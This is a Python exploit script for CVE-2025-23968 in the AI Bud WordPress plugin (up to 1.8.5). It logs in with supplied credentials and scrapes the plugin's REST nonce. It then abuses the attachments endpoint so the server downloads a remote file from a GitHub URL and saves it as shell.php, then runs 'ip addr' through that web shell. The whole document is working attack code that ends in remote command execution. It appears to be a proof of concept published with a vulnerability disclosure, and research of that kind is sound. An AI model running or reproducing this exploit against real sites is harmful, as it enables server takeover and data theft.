# AI Bud – AI Content Generator, AI Chatbot, ChatGPT, Gemini, GPT-4o
# Date: 06/03/2025
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage: https://wpcenter.io/
# Version: <= 1.8.5
# Tested on: 1.8.5
# CVE : CVE-2025-23968

import re
import json
import urllib3
import requests
import argparse
import urllib.parse
from datetime import datetime


# Captured once at import time as a naive local datetime; main() uses it to build
# the wp-content/uploads/YYYY/MM path, so the year/month reflect this client's
# clock, not the server's (could differ around a month boundary — keep in mind).
now: datetime = datetime.now()


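def extract_nonce(text):
    """Pull the REST nonce out of the plugin's localized-script block.

    The page embeds ``var ai_buddy_localized_data = {...};`` inside a
    ``<script id="ai_buddy_admin_scripts-js-extra">`` tag; the nonce is read
    from ``ai_buddy_image_post_attachment.nonce`` in that JSON object.

    Args:
        text: Raw HTML of the page (``response.text``). ``None`` or an empty
            string is treated as "not found" instead of raising.

    Returns:
        The nonce value, or ``None`` when the script block is absent, the
        embedded JSON does not parse, or the expected keys are missing /
        not nested as dicts.
    """
    if not text:
        return None

    pattern = (
        r'<script id="ai_buddy_admin_scripts-js-extra">.*?'
        r'var ai_buddy_localized_data = (.*?);\s*</script>'
    )
    match = re.search(pattern, text, re.DOTALL)
    if not match:
        return None

    try:
        parsed = json.loads(match.group(1))
        return parsed["ai_buddy_image_post_attachment"]["nonce"]
    except (json.JSONDecodeError, KeyError, TypeError):
        # TypeError covers valid JSON whose intermediate level is not a dict
        # (e.g. ``null`` or a list) — previously this escaped as a crash.
        return None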


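def wp_login(victim_url: str, username: str, password: str):
    """Authenticate against wp-login.php and return the authenticated session.

    Args:
        victim_url: Base URL of the WordPress site, without a trailing slash.
        username: WordPress account name.
        password: Password for that account.

    Returns:
        A ``requests.Session`` carrying the WordPress auth cookies. The session
        is intentionally not created with ``with``: the original's context
        manager closed the session on the way out, before the caller used it.

    Raises:
        RuntimeError: if the response set no ``wordpress_logged_in_*`` cookie,
            i.e. the credentials were rejected (or the login form changed), so
            the caller does not continue with an unauthenticated session.
    """
    session = requests.Session()

    # Pre-set the test cookie the browser login page would have stored.
    login_headers = {"Cookie": "wordpress_test_cookie=WP Cookie check"}
    form = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": f"{victim_url}/wp-admin",
        "testcookie": "1",
    }

    # verify=False is kept from the original so lab hosts with self-signed
    # certificates work; note it also means the credentials in ``form`` are
    # sent to a peer whose certificate has not been validated.
    session.post(f"{victim_url}/wp-login.php", headers=login_headers, data=form, verify=False)

    logged_in = any(name.startswith("wordpress_logged_in") for name in session.cookies.keys())
    if not logged_in:
        raise RuntimeError(f"Login to {victim_url} failed: no wordpress_logged_in cookie was set")
    return session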

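def main():
    """Command-line entry point: log in, fetch the REST nonce, upload, then probe.

    Stops with a ``SystemExit`` message when the nonce is not present on the
    tools page or the upload request is not accepted. Without the first check
    the script sent ``X-Wp-Nonce: None``, which requests rejects with an opaque
    ``InvalidHeader`` error far from the real cause.
    """
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    # Parse command line arguments
    parser = argparse.ArgumentParser(description="CVE-2025-23968: An exploit...")
    parser.add_argument("victim_url", help="Target url or ip address.")
    parser.add_argument("username", help="The username for the WordPress instance.")
    parser.add_argument("password", help="The password for the WordPress instance.")
    args = parser.parse_args()

    # Log into WordPress and use this session for the requests.
    print(f"Logging into: {args.victim_url}/wp-admin")
    wp_session = wp_login(args.victim_url, args.username, args.password)

    # Grab and parse the HTML for the nonce.
    print("Extracting nonce values...")
    page_headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36'}
    r = wp_session.get(f"{args.victim_url}/wp-admin/tools.php", headers=page_headers, verify=False)
    da_nonce = extract_nonce(r.text)
    if da_nonce is None:
        raise SystemExit("Could not find the ai_buddy nonce on tools.php; check that the login succeeded and the plugin is active.")

    # Upload the malicious file.
    print("Uploading web shell: shell.php")

    upload_headers = {
        "X-Wp-Nonce": da_nonce,
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36",
        "Content-Type": "application/json; charset=UTF-8",
    }

    payload = {
        "title": "hack",
        "caption": "the",
        "alt": "planet",
        "description": "Hack the Planet!",
        "url": "https://raw.githubusercontent.com/d0n601/d0n601/refs/heads/master/test.jpg",
        "filename": "shell.php",
    }

    r = wp_session.post(f"{args.victim_url}/wp-json/ai-buddy/v1/wp/attachments", headers=upload_headers, json=payload, verify=False)
    if not r.ok:
        # Report the server's answer instead of silently moving on to the probe.
        raise SystemExit(f"Upload request was rejected: HTTP {r.status_code} {r.reason}")

    # Test Commands
    print("Executing test command: ip addr")
    # ``{now:%Y}`` replaces the original ``{now.strftime("%Y")}``: nested double
    # quotes inside an f-string only parse on Python 3.12+ (PEP 701).
    r = requests.get(
        f"{args.victim_url}/wp-content/uploads/{now:%Y}/{now:%m}/shell.php?cmd=ip addr",
        verify=False,
    )
    print(r.text)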
if __name__ == "__main__":
    # Run only when executed as a script, not when imported for its helpers.
    main()